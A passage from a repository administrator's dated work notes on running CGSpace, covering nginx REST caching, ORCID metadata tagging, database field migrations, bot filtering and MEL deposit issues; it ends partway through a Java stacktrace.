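    proxy_cache       rest_cache;
    proxy_cache_valid 200 24h;
    add_header        X-Cache-Status $upstream_cache_status;   # lets us see HIT/MISS while testing
    proxy_pass        http://tomcat;                            # upstream name is illustrative
}
```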
## 2022-09-12
- I am testing harvesting DSpace Test via AReS with the nginx proxy cache enabled
- I had to tune the regular expression in nginx a bit because the REST requests OpenRXV uses weren't matching
- Now I'm trying this one: `/rest/(handle|items|collections|communities)/?`
- Testing in [regex101.com](https://regex101.com/r/vPz11y/1) with this test string:
```
/rest/handle/10568/27611
/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&limit=10&offset=36270
/rest/handle/10568/110310?expand=all
/rest/rest/bitstreams/28926633-c7c2-49c2-afa8-6d81cadc2316/retrieve
/rest/bitstreams/15412/retrieve
/rest/items/083dbb0d-11e2-4dfe-902b-eb48e4640d04/metadata
/rest/items/083dbb0d-11e2-4dfe-902b-eb48e4640d04/bitstreams
/rest/collections/edea23c0-0ebd-4525-90b0-0b401f997704/items
/rest/items/14507941-aff2-4d57-90bd-03a0733ad859/metadata
/rest/communities/b38ea726-475f-4247-a961-0d0b76e67f85/collections
/rest/collections/e994c450-6ff7-41c6-98df-51e5c424049e/items?limit=10000
```
- I estimate that it will take about 1GB of cache to harvest 100,000 items from CGSpace with OpenRXV (10,000 pages of ten items each, so roughly 100KB per cached response)
- Basically all of them except the fourth and fifth (bitstream retrievals) should match
- Upload 682 OICRs from MARLO to CGSpace
- We had tested these on DSpace Test last month along with the MELIAs, Policies, and Innovations, but we decided to upload the OICRs first so that other things can link against them as related items
## 2022-09-14
- Meeting with Peter, Abenet, Indira, and Michael about CGSpace rollout plan for the Initiatives
## 2022-09-16
- Meeting with Marie-Angelique, Abenet, Margarita, and Sara about types for CG Core
- We are about halfway through the list of types now, with concrete actions for CG Core and CGSpace
- We will meet next in two weeks to hopefully finalize the list, then we can move on to definitions
## 2022-09-18
- Deploy the `org.apache.cocoon.uploads.autosave=false` change on CGSpace
- Start a harvest on AReS
## 2022-09-19
- Deploy the nginx proxy cache for /rest requests on CGSpace
- I had tested this last week on DSpace Test
- By my counts on CGSpace yesterday (Sunday, a busy day for the REST API), we had 5,654 URLs that were requested more than twice, and it tails off after that towards two, three, four, etc:
```console
# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk '$1 > 1' | wc -l
5654
# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk '$1 == 2' | wc -l
4710
# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk '$1 == 3' | wc -l
814
# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk '$1 == 4' | wc -l
86
# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk '$1 == 5' | wc -l
39
```
- For now I guess requests that were done two or three times by different clients will be cached and that's a win, and I expect more and more REST API activity soon when initiatives and One CGIAR stuff picks up
## 2022-09-20
- I checked the status of the nginx REST API cache on CGSpace and it was stuck at 7,083 items for hours:
```console
# find /var/cache/nginx/rest_cache/ -type f | wc -l
7083
```
- The proxy cache key zone is currently 1m, which can store ~8,000 keys, so that could be what we're running into
- I increased it to 2m and will keep monitoring it
- CIP webmaster contacted me to say they are having problems harvesting CGSpace from their WordPress
- I am not sure if there are issues due to the REST API caching I enabled...
## 2022-09-21
- Planning the Nairobi DSpace Users meeting with Abenet
- Planning to have a call about MEL submitting to CGSpace on Monday with Mohammed Salem
- I created two collections on DSpace Test: one with a workflow, and one without
- According to my notes from [2020-10]({{< relref "2020-10.md" >}}) the account must be in the admin group in order to submit via the REST API, so I added it to the admin group of each collection
## 2022-09-22
- Nairobi DSpace users meeting at ILRI
- I found a few users that didn't have ORCID iDs and were missing tags on CGSpace so I tagged them:
```console
dc.contributor.author,cg.creator.identifier
"Alonso, Silvia","Silvia Alonso: 0000-0002-0565-536X"
"Goopy, John P.","John Goopy: 0000-0001-7177-1310"
"Korir, Daniel","Daniel Korir: 0000-0002-1356-8039"
"Leitner, Sonja","Sonja Leitner: 0000-0002-1276-8071"
"Fèvre, Eric M.","Eric M. Fèvre: 0000-0001-8931-4986"
"Galiè, Alessandra","Alessandra Galie: 0000-0001-9868-7733"
"Baltenweck, Isabelle","Isabelle Baltenweck: 0000-0002-4147-5921"
"Robinson, Timothy P.","Timothy Robinson: 0000-0002-4266-963X"
"Lannerstad, Mats","Mats Lannerstad: 0000-0002-5116-3198"
"Graham, Michael","Michael Graham: 0000-0002-1189-8640"
"Merbold, Lutz","Lutz Merbold: 0000-0003-4974-170X"
"Rufino, Mariana C.","Mariana Rufino: 0000-0003-4293-3290"
"Wilkes, Andreas","Andreas Wilkes: 0000-0001-7546-991X"
"van der Weerden, T.","Tony van der Weerden: 0000-0002-6999-2584"
"Vermeulen, S.","Sonja Vermeulen: 0000-0001-6242-9513"
"Vermeulen, Sonja","Sonja Vermeulen: 0000-0001-6242-9513"
"Vermeulen, Sonja J.","Sonja Vermeulen: 0000-0001-6242-9513"
"Hung Nguyen-Viet","Hung Nguyen-Viet: 0000-0003-1549-2733"
"Herrero, Mario T.","Mario Herrero: 0000-0002-7741-5090"
"Thornton, Philip K.","Philip Thornton: 0000-0002-1854-0182"
"Duncan, Alan J.","Alan Duncan: 0000-0002-3954-3067"
"Lukuyu, Ben A.","Ben Lukuyu: 0000-0002-9374-3553"
"Lindahl, Johanna F.","Johanna Lindahl: 0000-0002-1175-0398"
"Okeyo Mwai, Ally","Ally Okeyo Mwai: 0000-0003-2379-7801"
"Wieland, Barbara","Barbara Wieland: 0000-0003-4020-9186"
"Omore, Amos O.","Amos Omore: 0000-0001-9213-9891"
"Randolph, Thomas F.","Thomas Fitz Randolph: 0000-0003-1849-9877"
"Staal, Steven J.","Steven Staal: 0000-0002-1244-1773"
"Hanotte, Olivier H.","Olivier Hanotte: 0000-0002-2877-4767"
"Dessie, Tadelle","Tadelle Dessie: 0000-0002-1630-0417"
"Dione, Michel M.","Michel Dione: 0000-0001-7812-5776"
"Gebremedhin, Berhanu","Berhanu Gebremedhin: 0000-0002-3168-2783"
"Ouma, Emily A.","Emily Ouma: 0000-0002-3123-1376"
"Roesel, Kristina","Kristina Roesel: 0000-0002-2553-1129"
"Bishop, Richard P.","Richard Bishop: 0000-0002-3720-9970"
"Lapar, Ma. Lucila","Ma. Lucila Lapar: 0000-0002-4214-9845"
"Rich, Karl M.","Karl Rich: 0000-0002-5581-9553"
"Hoekstra, Dirk","Dirk Hoekstra: 0000-0002-6111-6627"
"Nene, Vishvanath","Vishvanath Nene: 0000-0001-7066-4169"
"Patel, S.P.","Sonal Henson: 0000-0002-2002-5462"
"Hanson, Jean","Jean Hanson: 0000-0002-3648-2641"
"Marshall, Karen","Karen Marshall: 0000-0003-4197-1455"
"Notenbaert, An Maria Omer","An Maria Omer Notenbaert: 0000-0002-6266-2240"
"Ojango, Julie M.K.","Ojango J.M.K.: 0000-0003-0224-5370"
"Wijk, Mark T. van","Mark van Wijk: 0000-0003-0728-8839"
"Tarawali, Shirley A.","Shirley Tarawali: 0000-0001-9398-8780"
"Naessens, Jan","Jan Naessens: 0000-0002-7075-9915"
"Butterbach-Bahl, Klaus","Klaus Butterbach-Bahl: 0000-0001-9499-6598"
"Poole, Elizabeth J.","Elizabeth Jane Poole: 0000-0002-8570-794X"
"Mulema, Annet A.","Annet Mulema: 0000-0003-4192-3939"
"Dror, Iddo","Iddo Dror: 0000-0002-0800-7456"
"Ballantyne, Peter G.","Peter G. Ballantyne: 0000-0001-9346-2893"
"Baker, Derek","Derek Baker: 0000-0001-6020-6973"
"Ericksen, Polly J.","Polly Ericksen: 0000-0002-5775-7691"
"Jones, Christopher S.","Chris Jones: 0000-0001-9096-9728"
"Mude, Andrew G.","Andrew Mude: 0000-0003-4903-6613"
"Puskur, Ranjitha","Ranjitha Puskur: 0000-0002-9112-3414"
"Kiara, Henry K.","Henry Kiara: 0000-0001-9578-1636"
"Gibson, John P.","John Gibson: 0000-0003-0371-2401"
"Flintan, Fiona E.","Fiona Flintan: 0000-0002-9732-097X"
"Mrode, Raphael A.","Raphael Mrode: 0000-0003-1964-5653"
"Mtimet, Nadhem","Nadhem Mtimet: 0000-0003-3125-2828"
"Said, Mohammed Yahya","Mohammed Yahya Said: 0000-0001-8127-6399"
"Pezo, Danilo A.","Danilo Pezo: 0000-0001-5345-5314"
"Haileslassie, Amare","Amare Haileslassie: 0000-0001-5237-9006"
"Wright, Iain A.","Iain Wright: 0000-0002-6216-5308"
"Cadilhon, Joseph J.","Jean-Joseph Cadilhon: 0000-0002-3181-5136"
"Domelevo Entfellner, Jean-Baka","Jean-Baka Domelevo Entfellner: 0000-0002-8282-1325"
"Oyola, Samuel O.","Samuel O. Oyola: 0000-0002-6425-7345"
"Agaba, M.","Morris Agaba: 0000-0001-6777-0382"
"Beebe, Stephen E.","Stephen E Beebe: 0000-0002-3742-9930"
"Ouso, Daniel","Daniel Ouso: 0000-0003-0994-2558"
"Ouso, Daniel O.","Daniel Ouso: 0000-0003-0994-2558"
"Rono, Gilbert K.","Gilbert Kibet-Rono: 0000-0001-8043-5423"
"Kibet, Gilbert","Gilbert Kibet-Rono: 0000-0001-8043-5423"
"Juma, John","John Juma: 0000-0002-1481-5337"
"Juma, J.","John Juma: 0000-0002-1481-5337"
$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2022-09-22-add-orcids.csv -db dspace -u dspace -p 'fuuu'
```
- This adds nearly 5,500 ORCID tags!
- Some of these authors were not in the controlled vocabulary so I added them
## 2022-09-23
- Tag some more ORCID metadata (amended above)
- Meeting with Peter and Abenet to discuss CGSpace issues
- We found a workable solution to the MEL submission issue: they can submit to a dedicated MEL-only collection with no workflow and we will map or move the items after
- Pascal says that they have made a [pull request for their duplicate checker on DSpace 7](https://github.com/DSpace/DSpace/pull/8415) yayyyy
## 2022-09-24
- Found some more ORCID identifiers to tag so I added them to the list above
- Start a harvest on AReS around 8PM on Saturday night
## 2022-09-25
- The harvest on AReS finished and the load on the CGSpace server is high again, as it always is on Sunday mornings
- UptimeRobot says it's down, sigh...
- I had an idea to include the HTTP Accept header in the nginx proxy cache key to fix the issue we had with CIP last week
- It seems to work:
```console
$ http --print Hh 'https://dspacetest.cgiar.org/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&limit=10&offset=60'
...
Content-Type: application/json
X-Cache-Status: MISS
$ http --print Hh 'https://dspacetest.cgiar.org/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&limit=10&offset=60'
...
Content-Type: application/json
X-Cache-Status: HIT
$ http --print Hh 'https://dspacetest.cgiar.org/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&limit=10&offset=60' Accept:application/xml
...
Content-Type: application/xml
X-Cache-Status: MISS
$ http --print Hh 'https://dspacetest.cgiar.org/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&limit=10&offset=60' Accept:application/xml
...
Content-Type: application/xml
X-Cache-Status: HIT
```
- This effectively makes our cache half as effective, since JSON and XML responses are now cached separately, but hopefully the number of requests it handles will go up as more people start harvesting
- I will enable this on CGSpace and email Moises from CIP to check if their harvester is working
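- For reference, the nginx change is essentially just appending the Accept header to the proxy cache key, something like this (a sketch; our actual configuration may use a slightly different base key):

```console
# Cache JSON and XML responses separately by including the client's Accept
# header in the cache key (sketch of the idea, not the exact production config)
proxy_cache_key "$scheme$proxy_host$request_uri$http_accept";
```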
## 2022-09-26
- Update welcome text on CGSpace after our meeting last week
- I found another dozen or so ORCIDs for top authors on ILRI's community on CGSpace and tagged them (~1,100 more metadata fields)
- Last week we discussed moving `cg.identifier.googleurl` to `cg.identifier.url` since there is no need to treat Google Books URLs specially anymore as far as we know
- I made the changes to the submission form and the XMLUI item displays, then moved all existing metadata in PostgreSQL:
```console
dspace= ☘ UPDATE metadatavalue SET metadata_field_id=219 WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=222;
UPDATE 1137
```
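- Before deleting the old field from the registry, it's worth a quick sanity check that no item metadata still uses it (a sketch using the same field IDs as above):

```console
dspace= ☘ SELECT COUNT(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=222;
```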
- Then I deleted `cg.identifier.googleurl` from the metadata registry
- Meeting with Salem, Svetlana, Valentina, and Abenet about MEL depositing to CGSpace for the initiatives
- Submitting to a collection without a workflow works as expected, and we can even select another collection (with a workflow) to map the item to from the MEL submission
- The three minor issues we found were:
- MEL still doesn't send the bitstream
- MEL sends metadata with a download URL on mel.cgiar.org
- MEL sends a JPEG that says "no thumbnail" when an item doesn't have a thumbnail
- I still need to send feedback to the group
## 2022-09-27
- Find a few more ORCID identifiers missing for ILRI authors and add them to the controlled vocabulary and tag the authors on CGSpace
- Moises from CIP says the WordPress importer worked fine with the current nginx proxy cache settings so it seems adding the HTTP Accept header to the cache key worked
- Update my DSpace 7 environments to 7.4-SNAPSHOT
- I see they have added thumbnails in some places now
- Oh nice, they also added the "recent submissions" to the home page
- While talking with Salem about the MEL depositing to CGSpace we discovered an issue with HTTP DELETE on `/items/{item id}/bitstreams/{bitstream id}` or `/bitstreams/{bitstream id}`
- DSpace removes the bitstream but keeps the empty `THUMBNAIL` bundle, which breaks the display in XMLUI
- Meeting with Enrico et al about PRMS reporting for the initiatives
## 2022-09-28
- I was reading the source code for DSpace 6's REST API and found that it's [not possible to specify a bundle while POSTing a bitstream](https://github.com/DSpace/DSpace/blob/dspace-6.4/dspace-rest/src/main/java/org/dspace/rest/ItemsResource.java#L427)
- I asked Salem how they do it on MEL and he said they pretend to be a human and do it via XMLUI!
- I added a few new ILRI subjects to the input forms on CGSpace
- Both "bushmeat" and "wildlife conservation" are AGROVOC terms, but "wild meat" is not
- The distinction ILRI would like to start making is:
> Meat comes from any animal, and when at ILRI we specifically make
> reference to it in the context of livestock. However the word bushmeat
> refers to illegal harvesting of meat. wild meat is being used as legal
> harvesting of meat from wildlife and not from livestock.
- I added a few more CGIAR authors ORCID identifiers to our controlled vocabulary and tagged them on CGSpace (~450 more metadata fields)
- Talking to Salem about ORCID identifiers, we compared lists and they have a bunch that we don't have:
```console
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml ~/Downloads/MEL_ORCID_2022-09-28.csv | \
grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | \
sort | \
uniq > /tmp/2022-09-29-combined-orcids.txt
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
1421
$ wc -l /tmp/2022-09-29-combined-orcids.txt
1905 /tmp/2022-09-29-combined-orcids.txt
```
- After combining them I ran them through my `resolve-orcids.py` script:
```console
$ ./ilri/resolve-orcids.py -i /tmp/2022-09-29-combined-orcids.txt -o /tmp/2022-09-29-combined-orcids-names.txt -d
```
- I wrote a script `update-orcids.py` to read a list of names and ORCID identifiers and update existing metadata in the database to the latest name format:
```console
$ ./ilri/update-orcids.py -i ~/src/git/cgspace-submission-guidelines/content/terms/cg-creator-identifier/cg-creator-identifier.txt -db dspace -u dspace -p 'fuuu' -m 247 -d
Connected to database.
Fixed 9 occurences of: ADEBOWALE AD AKANDE: 0000-0002-6521-3272
Fixed 43 occurences of: Alamu Emmanuel Oladeji (PhD, FIFST, MNIFST): 0000-0001-6263-1359
Fixed 3 occurences of: Alessandra Galie: 0000-0001-9868-7733
Fixed 1 occurences of: Amanda De Filippo: 0000-0002-1536-3221
...
```
## 2022-09-29
- I've been checking the size of the nginx proxy cache the last few days and it always seems to hover around 14,000 entries and 385MB:
```console
# find /var/cache/nginx/rest_cache/ -type f | wc -l
14202
# du -sh /var/cache/nginx/rest_cache
384M /var/cache/nginx/rest_cache
```
- Also on that note I'm trying to implement a workaround for a potential caching issue that causes MEL to not be able to update items on DSpace Test
- I *think* we might need to allow requests with a JSESSIONID to bypass the cache, but I have to verify with Salem
- We can do this with an nginx map:
```console
# Check if the JSESSIONID cookie is present and contains a 32-character hex
# value, which would mean that a user is actively attempting to re-use their
# Tomcat session. Then we set the $active_user_session variable and use it
# to bypass the nginx proxy cache in REST requests.
map $cookie_jsessionid $active_user_session {
    # requests with an empty key are not evaluated by limit_req
    # see: http://nginx.org/en/docs/http/ngx_http_limit_req_module.html
    default '';
    '~[A-Z0-9]{32}' 1;
}
```
- Then in the location block where we do the proxy cache:
```console
# Don't cache when user Shift-refreshes (Cache-Control: no-cache) or
# when a client has an active session (see the $cookie_jsessionid map).
proxy_cache_bypass $http_cache_control $active_user_session;
proxy_no_cache $http_cache_control $active_user_session;
```
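- Once this is deployed we should be able to verify the bypass by sending a request with a (hypothetical) JSESSIONID cookie and checking for `X-Cache-Status: BYPASS`:

```console
$ http --print Hh 'https://dspacetest.cgiar.org/rest/items?expand=metadata&limit=1' Cookie:JSESSIONID=0123456789ABCDEF0123456789ABCDEF
...
X-Cache-Status: BYPASS
```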
- I found one client making 10,000 requests using a Windows 98 user agent:
```console
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
```
- They all come from one IP address (129.227.149.43) in Hong Kong
- The IP belongs to a hosting provider called Zenlayer
- I will add this IP to the nginx bot networks and purge its hits
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ip -p
Purging 33027 hits from 129.227.149.43 in statistics
Total number of bot hits purged: 33027
```
- So it seems we've seen this bot before, since the total number of hits purged is much higher than the ~10,000 from this month
- I had a call with Salem and we verified that the nginx cache bypass for clients who provide a JSESSIONID fixes their issue with updating items/bitstreams from MEL
- The issue was that they delete all metadata and bitstreams, then add them again to make sure everything is up to date. In that process they also re-request the item with all expands to get the bitstreams, but that response gets cached, so when they later try to delete the old bitstream they are working from stale data
- I also noticed that someone made a [pull request to enable POSTing bitstreams to a particular bundle](https://github.com/DSpace/DSpace/pull/8343) and it works, so that's awesome!
## 2022-09-30
- I applied [the patch for POSTing bitstreams to other bundles](https://github.com/DSpace/DSpace/pull/8343) on CGSpace
- Testing a few other DSpace 6.4 patches on DSpace Test:
- [DS-3791 Make sure the "yearDifference" takes into account that a gap of 10 year contains 11 years](https://github.com/DSpace/DSpace/pull/1901)
- [DS-3873 Limit the usage of PDFBoxThumbnail to PDFs](https://github.com/DSpace/DSpace/pull/2501)
- [Reduce itemCounter init](https://github.com/DSpace/DSpace/pull/2161)
- [ImageMagick: Only execute "identify" on first page](https://github.com/DSpace/DSpace/pull/2201)
- [DS-3881: Show no total results on search-filter](https://github.com/DSpace/DSpace/pull/2371)
- [pass value instead of qualifier to method](https://github.com/DSpace/DSpace/pull/2699)
- [dspace-api: check for null AND empty qualifier in findByElement()](https://github.com/DSpace/DSpace/pull/7993)
- [Avoid exporting mapped Item more than once](https://github.com/DSpace/DSpace/pull/7995)
- [[DS-4574] v. 6 - Upgrade DBCP2 dependency](https://github.com/DSpace/DSpace/pull/3162)
- [bump up pdfbox version on 6.x to match main branch](https://github.com/DSpace/DSpace/pull/2742)
<!-- vim: set sw=2 ts=2: -->

---
title: "October, 2022"
date: 2022-10-01T19:45:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-10-01
- Start a harvest on AReS last night
- Yesterday I realized how to use [GraphicsMagick with im4java](https://im4java.sourceforge.net/docs/dev-guide.html) and I want to re-visit some of my thumbnail tests
- I'm also interested in libvips support via jVips, though last time I checked it was only for Java 8
- I filed [an issue to ask about Java 11+ support](https://github.com/criteo/JVips/issues/141)
<!--more-->
## 2022-10-03
- Make two pull requests for DSpace 7.x
- [Update PDFBox dependency to version 2.0.27](https://github.com/DSpace/DSpace/pull/8503)
- [Update Apache commons-dbcp2 and commons-pool2 dependencies](https://github.com/DSpace/DSpace/pull/8504)
- Udana had asked me about their RSS feed not showing the latest publications in his email inbox
- He is using this feed from FeedBurner: https://feeds.feedburner.com/iwmi-cgspace
- I don't have access to the FeedBurner configuration, but I looked at the [raw feed](https://gist.github.com/alanorth/0c518fc571f450f8cc353c42cbdd277c) and see it's just getting all the items in the IWMI community
- This OpenSearch query should do the same: `https://cgspace.cgiar.org/open-search/discover?scope=10568/16814&query=*&sort_by=3&order=DESC`
- The `sort_by=3` corresponds to `webui.itemlist.sort-option.3 = dateaccessioned:dc.date.accessioned:date` in dspace.cfg
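- If FeedBurner needs an actual feed rather than the HTML results page, the same OpenSearch query should work with a format parameter, something like this (assuming the stock DSpace 6 `format` parameter):

```console
$ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568/16814&query=*&sort_by=3&order=DESC&format=atom'
```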
- Peter sent me a CSV file a few days ago that he was unable to upload to CGSpace
- The stacktrace from the error he was getting was:
```console
Java stacktrace: java.lang.ClassCastException: org.apache.cocoon.servlet.multipart.PartInMemory cannot be cast to org.dspace.app.xmlui.cocoon.servlet.multipart.DSpacePartOnDisk
at org.dspace.app.xmlui.aspect.administrative.FlowMetadataImportUtils.processUploadCSV(FlowMetadataImportUtils.java:116)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.mozilla.javascript.MemberBox.invoke(MemberBox.java:155)
at org.mozilla.javascript.NativeJavaMethod.call(NativeJavaMethod.java:243)
at org.mozilla.javascript.Interpreter.interpretLoop(Interpreter.java:3237)
at org.mozilla.javascript.Interpreter.interpret(Interpreter.java:2394)
at org.mozilla.javascript.InterpretedFunction.call(InterpretedFunction.java:162)
at org.mozilla.javascript.ContextFactory.doTopCall(ContextFactory.java:393)
at org.mozilla.javascript.ScriptRuntime.doTopCall(ScriptRuntime.java:2834)
at org.mozilla.javascript.InterpretedFunction.call(InterpretedFunction.java:160)
at org.mozilla.javascript.Context.call(Context.java:538)
at org.mozilla.javascript.ScriptableObject.callMethod(ScriptableObject.java:1833)
at org.mozilla.javascript.ScriptableObject.callMethod(ScriptableObject.java:1803)
at org.apache.cocoon.components.flow.javascript.fom.FOM_JavaScriptInterpreter.handleContinuation(FOM_JavaScriptInterpreter.java:698)
at org.apache.cocoon.components.treeprocessor.sitemap.CallFunctionNode.invoke(CallFunctionNode.java:94)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.SelectNode.invoke(SelectNode.java:82)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.buildPipeline(ConcreteTreeProcessor.java:186)
at org.apache.cocoon.components.treeprocessor.TreeProcessor.buildPipeline(TreeProcessor.java:260)
at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:107)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.SelectNode.invoke(SelectNode.java:87)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.buildPipeline(ConcreteTreeProcessor.java:186)
at org.apache.cocoon.components.treeprocessor.TreeProcessor.buildPipeline(TreeProcessor.java:260)
at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:107)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.buildPipeline(ConcreteTreeProcessor.java:186)
at org.apache.cocoon.components.treeprocessor.TreeProcessor.buildPipeline(TreeProcessor.java:260)
at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:277)
at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy190.setup(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy190.setup(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
